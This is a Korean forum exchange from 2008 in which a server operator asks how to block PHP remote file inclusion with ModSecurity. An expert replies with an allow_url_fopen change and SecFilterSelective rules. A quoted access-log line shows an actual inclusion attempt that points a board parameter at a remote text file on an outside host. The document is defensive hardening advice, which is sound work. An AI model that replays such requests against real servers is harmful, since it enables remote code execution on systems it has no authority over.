modsecurity 설정에 대한 문의를 드립니다

안녕하세요.. 씨디네트웍스 홍석범입니다.

아래의 공격방식은 몇년전부터 보였던 아주 전형적인 php injection 방식입니다.

굳이 modsecurity가 아니더라도 php.ini에서

allow_url_fopen = On 을
allow_url_fopen = Off 로만 변경하여 외부소스를 실행하지 못하도록 설정해도 쉽게 차단이 됩니다.

물론 modsecurity 에서도 차단룰이 기본적으로 있습니다.

SecFilterSelective REQUEST_URI "=(http|https|ftp):/" "msg:'PHP Injection Attacks'"

로 적용하셔도 되고, cid를 사용하신다니

SecFilterSelective REQUEST_URI "cid=(http|https|ftp):/" "msg:'PHP Injection Attacks'"

와 같이 지정하셔도 되겠습니다.

감사합니다.

보안철저 님의 글

modsecurity 설정에 대한 문의를 드립니다. 최근에 로그 화일을 살펴보니 모두 공통된

사항이 있어서 그부분을 차단하면 제가 운영하는 서버에서는 어느 정도 효과가 있을것만

간다는 생각이 들어서요 제가 운영하는 서버에는 거의 모두 같은 게시판을 사용합니다.

get으로 받는 cid가 카테고리 코드인데 아래와 같이 cid=http:// 이런 형식이 들어가 있더라구요.

modsecurity설정화일에 어떻게 추가를 해야 하는지 전문가님의 답변을 부탁드립니다.

그리고 먼저번 질문에 답변 주신 홍석범님께 깊이 감사드립니다.

88.80.202.189 - - [12/Nov/2008:05:30:30 +0900] "GET /board/kboard.php?board=notice&act=view&no=3//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 200 10155